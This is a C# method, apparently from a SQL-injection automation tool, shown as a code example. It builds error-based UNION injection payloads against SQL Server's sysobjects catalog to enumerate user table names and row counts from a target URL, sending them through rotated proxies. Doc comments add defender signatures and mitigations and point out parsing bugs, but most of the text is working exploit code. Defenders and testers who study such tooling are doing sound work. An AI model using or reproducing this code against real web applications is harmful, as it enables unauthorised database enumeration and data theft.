Пример #1
        /// <summary>
        /// Reads the first user table whose object id is greater than
        /// <paramref name="PreviousTableID"/> from the target's <c>sysobjects</c> catalog,
        /// then issues a second request for that table's row count.
        /// </summary>
        /// <param name="PreviousTableID">Object id of the last table already retrieved; used as an exclusive lower bound.</param>
        /// <returns>
        /// A table record with <c>Name</c> and <c>ObjectID</c> filled in, and <c>RecordCount</c>
        /// set to the parsed count or to -1 when the second response yields no text.
        /// </returns>
        /// <remarks>
        /// Both statements wrap character data in <c>convert(int, ...)</c>. On SQL Server that
        /// conversion fails and the error text quotes the value, which is presumably what the
        /// <c>ParsePage</c> helpers extract (their bodies are not visible here).
        /// For defenders: the injected parameter carries the literal fragments
        /// <c>convert(int,</c>, <c>char(58)</c> and <c>sysobjects</c>, which are practical
        /// request-log and WAF signatures. Parameterised queries at the injection point,
        /// generic error pages, and a database login without catalog read access each stop
        /// this step.
        /// </remarks>
        private GlobalDS.Table RetrieveTable(long PreviousTableID)
        {
            GlobalDS.Table table = new GlobalDS.Table();

            // char(85) is 'U' (user tables in sysobjects); char(58) is ':' and serves as the
            // separator between the table name and its object id in the returned text.
            string catalogFilter = "xtype=char(85) and id > " + PreviousTableID.ToString();
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect(
                "convert(int, name + char(58) + convert(char, id))",
                "sysobjects",
                catalogFilter);

            string catalogPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            string nameAndId = ParsePage.ParseUnionSelectForNvarchar(catalogPage, _Plugin);

            // No length check follows the split: a response without ':' makes parts[1] throw,
            // and a table name that itself contains ':' shifts the fields.
            string[] parts = nameAndId.Split(':');

            table.Name = parts[0];
            table.ObjectID = Convert.ToInt64(parts[1]);

            // The name returned by the remote server is passed on unmodified as the table
            // argument of the count statement.
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect(
                "convert(int, char(58) + convert(char, count(*)))",
                parts[0],
                null);

            string countPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            string countText = ParsePage.ParseUnionSelectForVarchar(countPage, _Plugin);

            if (countText.Length == 0)
            {
                // Nothing could be parsed from the second response; -1 marks the count as unknown.
                table.RecordCount = -1;
                return table;
            }

            // Drop the leading ':' separator, then parse the remaining digits.
            string digits = countText.Substring(1).Trim();
            table.RecordCount = Convert.ToInt64(digits);
            return table;
        }